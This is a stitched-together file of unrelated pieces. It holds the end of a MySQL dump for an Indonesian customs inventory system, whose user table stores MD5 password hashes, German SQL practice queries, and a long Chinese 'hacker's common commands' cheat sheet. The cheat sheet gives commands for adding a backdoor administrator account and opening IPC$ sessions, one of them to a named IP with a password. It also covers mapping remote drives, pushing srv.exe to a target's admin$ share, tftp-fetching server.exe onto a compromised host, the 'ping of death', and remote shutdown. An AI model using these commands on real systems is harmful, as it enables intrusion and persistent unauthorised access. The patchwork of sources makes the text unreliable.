INSERT INTO satuan VALUES ('TSH', 'Ton of steam per hour'); INSERT INTO satuan VALUES ('VLT', 'Volt'); INSERT INTO satuan VALUES ('WCD', 'Cord (3,63 m3)'); INSERT INTO satuan VALUES ('WEB', 'Weber'); INSERT INTO satuan VALUES ('WEE', 'Week'); INSERT INTO satuan VALUES ('WHR', 'Watt-hour'); INSERT INTO satuan VALUES ('WSD', 'Standard'); INSERT INTO satuan VALUES ('WTT', 'Watt'); INSERT INTO satuan VALUES ('YDK', 'Square yard'); INSERT INTO satuan VALUES ('YDQ', 'Cubic yard'); INSERT INTO satuan VALUES ('YRD', 'Yard (0.9144 m)'); -- ---------------------------- -- Table structure for `tujuan_pengiriman` -- ---------------------------- DROP TABLE IF EXISTS `tujuan_pengiriman`; CREATE TABLE `tujuan_pengiriman` ( `KdTp` tinyint(1) NOT NULL DEFAULT '0' COMMENT 'Kode Tujuan Pengiriman', `UrTp` varchar(25) DEFAULT NULL COMMENT 'Uraian Tujuan Pengiriman', PRIMARY KEY (`KdTp`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of tujuan_pengiriman -- ---------------------------- INSERT INTO tujuan_pengiriman VALUES ('1', 'Ditimbun'); INSERT INTO tujuan_pengiriman VALUES ('2', 'Diproses'); INSERT INTO tujuan_pengiriman VALUES ('3', 'Disubkontrakkan'); INSERT INTO tujuan_pengiriman VALUES ('4', 'Dipinjamkan'); INSERT INTO tujuan_pengiriman VALUES ('5', 'Diperbaiki'); INSERT INTO tujuan_pengiriman VALUES ('6', 'Pengembalian Subkontrak'); INSERT INTO tujuan_pengiriman VALUES ('7', 'Pengembalian Pinjaman'); INSERT INTO tujuan_pengiriman VALUES ('8', 'Pengembalian Perbaikan'); INSERT INTO tujuan_pengiriman VALUES ('9', 'Lainnya'); INSERT INTO tujuan_pengiriman VALUES ('10', 'Dijual'); -- ---------------------------- -- Table structure for `user` -- ---------------------------- DROP TABLE IF EXISTS `user`; CREATE TABLE `user` ( `nama_user` varchar(20) NOT NULL, `pass` varchar(32) NOT NULL, `kd_fact` varchar(2) DEFAULT NULL, `kd_cmpy` varchar(2) NOT NULL, `grup` enum('admin','gudang','exim','bc','eksekutif') DEFAULT NULL, PRIMARY KEY (`nama_user`,`kd_cmpy`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of user -- ---------------------------- INSERT INTO user VALUES ('admin', '9c8f9b597c7e4b218d58ed8631e6d6a3', null, '01', 'admin'); INSERT INTO user VALUES ('asep', 'b5f0ca3662c71718064dc329d74110d9', null, '', 'eksekutif'); INSERT INTO user VALUES ('exim', 'a8eaf1f61b2dd90a2ce1707affe4b0bb', null, '', 'exim'); INSERT INTO user VALUES ('gudang', '8f0d60caf45e98ac44db4074c3b22893', null, '', 'gudang'); INSERT INTO user VALUES ('bc', 'fe51fce2cf2e87b6bf2aa84b0968e877', null, '', 'bc'); -- ---------------------------- -- Table structure for `valuta` -- ---------------------------- DROP TABLE IF EXISTS `valuta`; CREATE TABLE `valuta` ( `KdVal` varchar(3) NOT NULL, `UrVal` varchar(30) NOT NULL, PRIMARY KEY (`KdVal`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of valuta -- ---------------------------- INSERT INTO valuta VALUES ('BRL', 'Brazilian Real'); INSERT INTO valuta VALUES ('BSD', 'Bahamian Dollar'); INSERT INTO valuta VALUES ('BTN', 'Ngultrum'); INSERT INTO valuta VALUES ('BWP', 'Pula'); INSERT INTO valuta VALUES ('BYB', 'Belarussian Ruble'); INSERT INTO valuta VALUES ('BZD', 'Belize Dollar'); INSERT INTO valuta VALUES ('CAD', 'Canadian Dollar'); INSERT INTO valuta VALUES ('CHF', 'Swiss Franc'); INSERT INTO valuta VALUES ('CLP', 'Chilean Peso'); INSERT INTO valuta VALUES ('CNY', 'Yuan Renminbi'); INSERT INTO valuta VALUES ('COP', 'Colombian Peso'); INSERT INTO valuta VALUES ('CRC', 'Costa Rican Colon'); INSERT INTO valuta VALUES ('CUP', 'Cuban Peso'); INSERT INTO valuta VALUES ('CVE', 'Cape Verde Escudo'); INSERT INTO valuta VALUES ('CYP', 'Cyprus Pound'); INSERT INTO valuta VALUES ('CZK', 'Czech Koruna'); INSERT INTO valuta VALUES ('DEM', 'Deustche Mark'); INSERT INTO valuta VALUES ('DJF', 'Djibouti Franc'); INSERT INTO valuta VALUES ('DKK', 'Danish Krone'); INSERT INTO valuta VALUES ('DOP', 'Domincan Peso'); INSERT INTO valuta VALUES ('DZD', 'Algerian Dinar'); INSERT INTO valuta VALUES ('ECS', 'Sucre'); INSERT INTO valuta VALUES ('EEK', 'Kroon'); INSERT INTO valuta VALUES ('EGP', 'Egyptian Pound'); INSERT INTO valuta VALUES ('ESP', 'Spainish peseta'); INSERT INTO valuta VALUES ('ETB', 'Ethiopian Birr'); INSERT INTO valuta VALUES ('EUR', 'Euro'); INSERT INTO valuta VALUES ('FIM', 'Markka'); INSERT INTO valuta VALUES ('FJD', 'Fiji Dollar'); INSERT INTO valuta VALUES ('FKP', 'Falkland Islands Pound'); INSERT INTO valuta VALUES ('FRF', 'Franch Franc'); INSERT INTO valuta VALUES ('GBP', 'Pound Sterling'); INSERT INTO valuta VALUES ('GEK', 'Georgian Coupon'); INSERT INTO valuta VALUES ('GHC', 'Cedi'); INSERT INTO valuta VALUES ('GIP', 'Gibraltar Pound'); INSERT INTO valuta VALUES ('GMD', 'Dalasi'); INSERT INTO valuta VALUES ('GNF', 'Guinea Franc'); INSERT INTO valuta VALUES ('GRD', 'Drachma'); INSERT INTO valuta VALUES ('GTQ', 'Quetzal'); INSERT INTO valuta VALUES ('GWP', 'Guinea-Bissau Peso'); INSERT INTO valuta VALUES ('GYD', 'Guyana Dollar'); INSERT INTO valuta VALUES ('HKD', 'Hong Kong Dollar'); INSERT INTO valuta VALUES ('HNL', 'Lempira'); INSERT INTO valuta VALUES ('HRD', 'Croatian Dinar'); INSERT INTO valuta VALUES ('HRK', 'Kuna'); INSERT INTO valuta VALUES ('HTG', 'Gourde'); INSERT INTO valuta VALUES ('HUF', 'Forint'); INSERT INTO valuta VALUES ('IDR', 'Rupiah'); INSERT INTO valuta VALUES ('IEP', 'Irish Pound'); INSERT INTO valuta VALUES ('ILS', 'Shekel'); INSERT INTO valuta VALUES ('INR', 'Indian Rupee'); INSERT INTO valuta VALUES ('IQD', 'Iraqi Dinar'); INSERT INTO valuta VALUES ('IRR', 'Iranian Rial'); INSERT INTO valuta VALUES ('ISK', 'Iceland Krona'); INSERT INTO valuta VALUES ('ITL', 'Italian Lira'); INSERT INTO valuta VALUES ('JMD', 'Jamaican Dollar'); INSERT INTO valuta VALUES ('JOD', 'Jordanian Dinar'); INSERT INTO valuta VALUES ('JPY', 'Yen'); INSERT INTO valuta VALUES ('KES', 'Kenyan Shilling'); INSERT INTO valuta VALUES ('KGS', 'Som'); INSERT INTO valuta VALUES ('KHR', 'Riel'); INSERT INTO valuta VALUES ('KMF', 'Comoro Franc'); INSERT INTO valuta VALUES ('KPW', 'North Korean Won'); INSERT INTO valuta VALUES ('KRW', 'Won'); INSERT INTO valuta VALUES ('KWD', 'Kuwauti Dinar'); INSERT INTO valuta VALUES ('KYD', 'Cayman Islands Dollar'); INSERT INTO valuta VALUES ('KZT', 'Tenge'); INSERT INTO valuta VALUES ('LAK', 'Kip'); INSERT INTO valuta VALUES ('LBP', 'Lebanese Pound'); INSERT INTO valuta VALUES ('LKR', 'Sri Langka Rupee'); INSERT INTO valuta VALUES ('LRD', 'Liberian Dollar'); INSERT INTO valuta VALUES ('LSL', 'Loli'); INSERT INTO valuta VALUES ('LTL', 'Lithuanian Litas'); INSERT INTO valuta VALUES ('LUF', 'Luxembourg Franc'); INSERT INTO valuta VALUES ('LVL', 'Latvian Lats#'); INSERT INTO valuta VALUES ('LVR', 'Latvian Ruble'); INSERT INTO valuta VALUES ('LYD', 'Libyan Dinar'); INSERT INTO valuta VALUES ('MAD', 'Moroccoan Dirham'); INSERT INTO valuta VALUES ('MDL', 'Moldovan Leu'); INSERT INTO valuta VALUES ('MGF', 'Malagasy Franc'); INSERT INTO valuta VALUES ('MMK', 'Kyat'); INSERT INTO valuta VALUES ('MNT', 'Tugrik'); INSERT INTO valuta VALUES ('MOP', 'Pataca'); INSERT INTO valuta VALUES ('MRO', 'Ouguiya'); INSERT INTO valuta VALUES ('MTL', 'Mallese Lira'); INSERT INTO valuta VALUES ('MUR', 'Mauritius Pupee'); INSERT INTO valuta VALUES ('MVR', 'Rufiyaa'); INSERT INTO valuta VALUES ('MWK', 'Kwacha'); INSERT INTO valuta VALUES ('MXN', 'Mexican Nuevo Peso'); INSERT INTO valuta VALUES ('MYR', 'Malaysian Ringgit'); INSERT INTO valuta VALUES ('MZM', 'Metical'); INSERT INTO valuta VALUES ('NAD', 'Namibia Dollar'); INSERT INTO valuta VALUES ('NGN', 'Naira'); INSERT INTO valuta VALUES ('NIO', 'Cordoba Oro'); INSERT INTO valuta VALUES ('NLG', 'Netherlands Guilder'); INSERT INTO valuta VALUES ('NOK', 'Norwegian Krone'); INSERT INTO valuta VALUES ('NPR', 'Nepalese Rupee'); INSERT INTO valuta VALUES ('NZD', 'New Zealand Dollar'); INSERT INTO valuta VALUES ('OMR', 'Rial Omani'); INSERT INTO valuta VALUES ('PAB', 'Balboa/US Dollar'); INSERT INTO valuta VALUES ('PEN', 'Nuevo Sol'); INSERT INTO valuta VALUES ('PGK', 'Kina'); INSERT INTO valuta VALUES ('PHP', 'Philippines Peso'); INSERT INTO valuta VALUES ('PKR', 'Pakistan Rupee'); INSERT INTO valuta VALUES ('PLZ', 'Zloty'); INSERT INTO valuta VALUES ('PTE', 'Portuguese Escudo'); INSERT INTO valuta VALUES ('PYG', 'Guarani'); INSERT INTO valuta VALUES ('QAR', 'Qatari Rial'); INSERT INTO valuta VALUES ('ROL', 'Leu'); INSERT INTO valuta VALUES ('Rp', 'Rupiah'); INSERT INTO valuta VALUES ('RUR', 'Russian Ruble'); INSERT INTO valuta VALUES ('RWF', 'Rwanda Franc'); INSERT INTO valuta VALUES ('SAR', 'Saudi Riyal'); INSERT INTO valuta VALUES ('SBD', 'Solomon Islands Dollar'); INSERT INTO valuta VALUES ('SCR', 'Seychelles Rupee'); INSERT INTO valuta VALUES ('SDD', 'Sudanase Dinar'); INSERT INTO valuta VALUES ('SDP', 'Sudanese Pound'); INSERT INTO valuta VALUES ('SEK', 'Swedish Krone'); INSERT INTO valuta VALUES ('SGD', 'Singapore Dollar'); INSERT INTO valuta VALUES ('SHP', 'St. Helena Pound'); INSERT INTO valuta VALUES ('SIT', 'Tolar'); INSERT INTO valuta VALUES ('SKK', 'Slovak Koruna'); INSERT INTO valuta VALUES ('SLL', 'Leone'); INSERT INTO valuta VALUES ('SOS', 'Somalia shilling'); INSERT INTO valuta VALUES ('SRG', 'Surinam Guilder'); INSERT INTO valuta VALUES ('STD', 'Dobra'); INSERT INTO valuta VALUES ('SVC', 'El Salvador Colon'); INSERT INTO valuta VALUES ('SYP', 'Syrian Pound'); INSERT INTO valuta VALUES ('SZL', 'Lilangeni'); INSERT INTO valuta VALUES ('THB', 'Baht'); INSERT INTO valuta VALUES ('TMM', 'Manat'); INSERT INTO valuta VALUES ('TND', 'Tunisian Dinar'); INSERT INTO valuta VALUES ('TOP', 'Pa\'anga'); INSERT INTO valuta VALUES ('TRL', 'Turkish Lira'); INSERT INTO valuta VALUES ('TTD', 'Trinidad & Tobago Dollar'); INSERT INTO valuta VALUES ('TWD', 'New Taiwan Dollar'); INSERT INTO valuta VALUES ('TZS', 'Tanzania Shilling'); INSERT INTO valuta VALUES ('UAK', 'Karbovanet'); INSERT INTO valuta VALUES ('UGX', 'Uganda Shilling'); INSERT INTO valuta VALUES ('USD', 'US Dollar'); INSERT INTO valuta VALUES ('UYU', 'Peso Uruguayo'); INSERT INTO valuta VALUES ('UZS', 'Ubekistan Sum'); INSERT INTO valuta VALUES ('VEB', 'Bolivar'); INSERT INTO valuta VALUES ('VND', 'Dong'); INSERT INTO valuta VALUES ('VUV', 'Vatu'); INSERT INTO valuta VALUES ('WST', 'Tala'); INSERT INTO valuta VALUES ('XAF', 'CFA Franc BAEC'); INSERT INTO valuta VALUES ('XCD', 'East Caribbean Dollar'); INSERT INTO valuta VALUES ('XOF', 'CFA Franc BCEAO'); INSERT INTO valuta VALUES ('XPF', 'CFA Franc BEAC'); INSERT INTO valuta VALUES ('YER', 'Yemeni Rial'); INSERT INTO valuta VALUES ('YUN', 'New Yugosslavian'); INSERT INTO valuta VALUES ('ZAL', 'Financial Rand'); INSERT INTO valuta VALUES ('ZAR', 'Rand'); INSERT INTO valuta VALUES ('ZMK', 'Kwacha'); INSERT INTO valuta VALUES ('ZRN', 'Zaife'); INSERT INTO valuta VALUES ('ZWD', 'Zimbabwe Dollar');
# 1. Zeigen sie alle Informationendes Produktes mit dem Namen 'Teatime Chocolate Biscuits' an. SELECT * FROM products WHERE ProductName = 'Teatime Chocolate Biscuits'; # 2. Wie lautet der 'CategoryName' des Produkts mit dem Namen 'Teatime Chocolate Biscuits'? SELECT CategoryName, ProductName FROM products, categories WHERE categories.CategoryID = products.CategoryID AND products.ProductName = 'Teatime Chocolate Biscuits'; # 3. Erstellen Sie eine Abfrage die die Produktnummer zum Produktnamen 'Tofu' ausgibt. SELECT ProductID FROM products WHERE products.ProductName = 'Tofu'; # 4. Vom welchen Lieferanten (CompanyName) wird das Prdukt mit dem Produktnamen 'Tofu' geliefert? SELECT ProductID, CompanyName FROM products, suppliers WHERE products.ProductName = 'Tofu' AND suppliers.SupplierID = products.SupplierID; # 5. Üer welche Versandfirma (CompanyName) wurde die Bestellung mit der Bestellnummer 10266 ausgeliefert? SELECT OrderID, CompanyName FROM orders, shippers WHERE orders.OrderID = 10266 AND orders.ShipVia = shippers.ShipperID; # 6. Welcher Mitarbeiter ist für die Bestellung mit der Nummer 10266 zuständig? Bitte geben Sie Vor- und Nachnamen aus. SELECT OrderID, employees.EmployeeID FROM orders, employees WHERE orders.OrderID = 10266 AND orders.EmployeeID = employees.EmployeeID;
SELECT p.title, u.username, u.profile_pic, p.content, p.img, u.user_id, p.post_id FROM posts p JOIN users u ON p.user_id = u.user_id;
create table if not exists book (isbn text, title text, author text, pages int, PRIMARY KEY (isbn)); create table if not exists book_alt (isbn text, title text, author text, pages int, PRIMARY KEY (isbn)); truncate table book; truncate table book_alt; insert into book (isbn, title, author, pages) values ('999999999', 'Book of Nines', 'Nine Nine', 999);
黑客常用命令大全 net user heibai lovechina /add 加一个heibai的用户密码为lovechina net localgroup Administrators heibai /add 把他加入Administrator组 net start telnet 开对方的TELNET服务 net use z:\127.0.0.1c$ 映射对方的C盘 net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use \\182.20.28.72\ipc$ "654321" /user:"zeng.lx" net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: \\ip\c$ 登陆后映射对方C:到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名 密码 /add 建立用户 net user 查看有哪些用户 net user 帐户名 查看帐户的属性 net user guest /active:yes 将Guest用户激活 net user guest lovechina 把guest的密码改为lovechina net user 用户名 /delete 删掉用户 net user guest/time:m-f,08:00-17:00 表示guest用户登录时间为周一至周 五的net user guest/time:m,4am-5pm;t,1pm-3pm;w-f,8:00-17:00 表示guest用户登录时间为周一4:00/17:00,周二13:00/15:00,周三至周五8:00/17:00. net user guest/time:all表示没有时间限制. net user guest/time 表示guest用户永远不能登录. 但是只能限制登陆时间,不是上网时间 net time \\127.0.0.1 得到对方的时间, get c:\index.htm d:\ 上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\ copy index.htm \\127.0.0.1\c$\index.htm 本地C盘下的index.htm复制到127.0.0.1的C盘 net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名  开启服务;(如:net start telnet, net start schedule) net stop 服务名 停止某服务 net time \\目标ip 查看对方时间 net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加参数/yes可取消确认信息 net view 查看本地局域网内开启了哪些共享 net view \\ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置 net logoff 断开连接的共享 net pause 服务名 暂停某服务 net send ip "文本信息" 向对方发信息 net ver 局域网内正在使用的网络连接类型和信息 net share 查看本地开启的共享 net share ipc$ 开启ipc$共享 net share ipc$ /del 删除ipc$共享 net share c$ /del 删除C:共享 net user guest 12345 用guest用户登陆后用将密码改为12345 net password 密码 更改系统登陆密码 netstat -a 查看开启了哪些端口,常用netstat -an netstat -n 查看端口的网络连接情况,常用netstat -an netstat -v 查看正在进行的工作 netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况) netstat -s 查看正在使用的所有协议使用情况 nbtsta* -* ** 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写 tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。 ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。 ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息 tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同) move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令 at id号 开启已注册的某个计划任务 at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止 at id号 /delete 停止某个已注册的计划任务 at 查看所有的计划任务 at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 finger username @host 查看最近有哪些用户登陆 telnet ip 端口 远和登陆服务器,默认端口为23 open ip 连接到IP(属telnet登陆后的命令) telnet 在本机上直接键入telnet 将进入本机的telnet copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件 copy c:\srv.exe $">\\ip\admin$ 复制本地c:\srv.exe到对方的admin下 cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件 copy $\svv.exe">\\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C: xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件 tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送 tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机 ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时) route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令 mem 查看cpu使用情况 attrib 文件名(目录名) 查看某文件(目录)的属性 attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性 dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间 date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间 set 指定环境变量名称=要指派给变量的字符 设置环境变量 set 显示当前所有的环境变量 set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 pause 暂停批处理程序,并显示出:请按任意键继续.... if 在批处理程序中执行条件处理(更多说明见if命令及变量) goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签) call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?) for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量) echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置 echo 信息 在屏幕上显示出信息 echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中 findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello find 文件名 查找某文件 title 标题名字 更改CMD窗口标题名字 color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ ) print 文件名 打印文本文件 ver 在DOS窗口下显示版本信息 winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名) format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS md 目录名 创建目录 replace 源文件 要替换文件的目录 替换文件 ren 原文件名 新文件名 重命名文件名 tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称 type 文件名 显示文本文件的内容 more 文件名 逐屏显示输出文件 doskey 要锁定的命令=字符 doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir= taskmgr 调出任务管理器 chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误 tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口 exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe path 路径\可执行文件的文件名 为可执行文件设置一个路径。 cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /? regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示; regedit /e 注册表文件名 导出注册表 cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 cacls 文件名 查看文件的访问用户权限列表 REM 文本内容 在批处理文件中添加注解 netsh 查看或更改本地网络配置情况 ////////////////////////// IIS服务命令: iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现) iisreset /start或stop 启动(停止)所有Internet服务 iisreset /restart 停止然后重新启动所有Internet服务 iisreset /status 显示所有Internet服务状态 iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动 iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机 iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务 iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。 ////////////////////////// FTP 命令: (后面有详细说明内容) ftp的命令行格式为: ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。 -d 使用调试方式。 -n 限制ftp的自动登录,即不使用.netrc文件。 -g 取消全局文件名。 help [命令] 或 ?[命令] 查看命令说明 bye 或 quit 终止主机FTP进程,并退出FTP管理方式. pwd 列出当前远端主机目录 put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 mget [remote-files] 从远端主机接收一批文件至本地主机 mput local-files 将本地主机中一批文件传送至远端主机 dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 ascii 设定以ASCII方式传送文件(缺省值) bin 或 image 设定以二进制方式传送文件 bell 每完成一次文件传送,报警提示 cdup 返回上一级目录 close 中断与远程服务器的ftp会话(与open对应) open host[port] 建立指定ftp服务器连接,可指定连接端口 delete 删除远端主机中的文件 mdelete [remote-files] 删除一批文件 mkdir directory-name 在远端主机中建立目录 rename [from] [to] 改变远端主机中的文件名 rmdir directory-name 删除远端主机中的目录 status 显示当前FTP的状态 system 显示远端主机系统类型 user user-name [password] [account] 重新以别的用户名登录远端主机 open host [port] 重新建立一个新的连接 prompt 交互提示模式 macdef 定义宏命令 lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录 chmod 改变远端主机的文件权限 case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 cd remote-dir 进入远程主机目录 cdup 进入远程主机目录的父目录 ! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip ////////////////////////// MYSQL 命令: mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。 (例:mysql -h110.110.110.110 -Uroot -P123456 注:u与root可以不用加空格,其它也一样) exit 退出MYSQL mysqladmin -u用户名 -p旧密码 password 新密码 修改密码 grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符) show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。 use mysql; show tables; 显示库中的数据表 describe 表名; 显示数据表的结构 create database 库名; 建库 use 库名; create table 表名 (字段设定列表); 建表 drop database 库名; drop table 表名; 删库和删表 delete from 表名; 将表中记录清空 select * from 表名; 显示表中的记录 mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的\\mysql\\bin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。 win2003系统下新增命令(实用部份): shutdown /参数 关闭或重启本地或远程主机。 参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。 例:shutdown /r /t 0 立即重启本地主机(无延时) taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。 参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。 tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。 参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。 ////////////////////////// Linux系统下基本命令: 要区分大小写 uname 显示版本信息(同win2K的 ver) dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir) pwd 查询当前所在的目录位置 cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。 cat 文件名 查看文件内容 cat >abc.txt 往abc.txt文件中写上内容。 more 文件名 以一页一页的方式显示一个文本文件。 cp 复制文件 mv 移动文件 rm 文件名 删除文件,rm -a 目录名删除目录及子目录 mkdir 目录名 建立目录 rmdir 删除子目录,目录内没有文档。 chmod 设定档案或目录的存取权限 grep 在档案中查找字符串 diff 档案文件比较 find 档案搜寻 date 现在的日期、时间 who 查询目前和你使用同一台机器的人以及Login时间地点 w 查询目前上机者的详细资料 whoami 查看自己的帐号名称 groups 查看某人的Group passwd 更改密码 history 查看自己下过的命令 ps 显示进程状态 kill 停止某进程 gcc 黑客通常用它来编译C语言写的文件 su 权限转换为指定使用者 telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。 ftp ftp连接上某服务器(同win2K) ////////////////////////// 附:批处理命令与变量 1:for命令及变量 基本格式: FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。 批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use $">\\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3 (set):指定一个或一组文件,可使用通配符,如:(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1} command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:& 来隔开 